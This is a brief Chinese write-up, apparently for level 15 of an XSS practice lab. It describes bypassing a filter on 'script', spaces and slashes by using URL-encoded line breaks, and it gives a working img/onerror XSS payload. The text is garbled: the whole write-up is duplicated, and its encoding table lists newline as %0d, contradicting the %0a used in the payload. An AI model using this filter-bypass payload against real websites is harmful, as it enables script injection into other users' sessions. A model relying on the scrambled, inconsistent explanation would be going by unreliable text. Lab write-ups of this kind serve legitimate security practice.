get传入可以word,转换为小写,让过滤script,空格,/,可以使用url编码来绕过
符号 url编码回车 %0d
换行 %0d
payload:
level15.php?keyword=<img%0asrc=http://www.likecs.com/x%0aonerror=alert('XSS')> 参考文章国光大佬:https://www.sqlsec.com/2020/01/xss.html
最后欢迎访问我的博客:https://lmg66.github.io/
get传入可以word,转换为小写,让过滤script,空格,/,可以使用url编码来绕过
符号 url编码payload:
level15.php?keyword=<img%0asrc=http://www.likecs.com/x%0aonerror=alert('XSS')> 参考文章国光大佬:https://www.sqlsec.com/2020/01/xss.html
最后欢迎访问我的博客:https://lmg66.github.io/
内容版权声明:除非注明,否则皆为本站原创文章。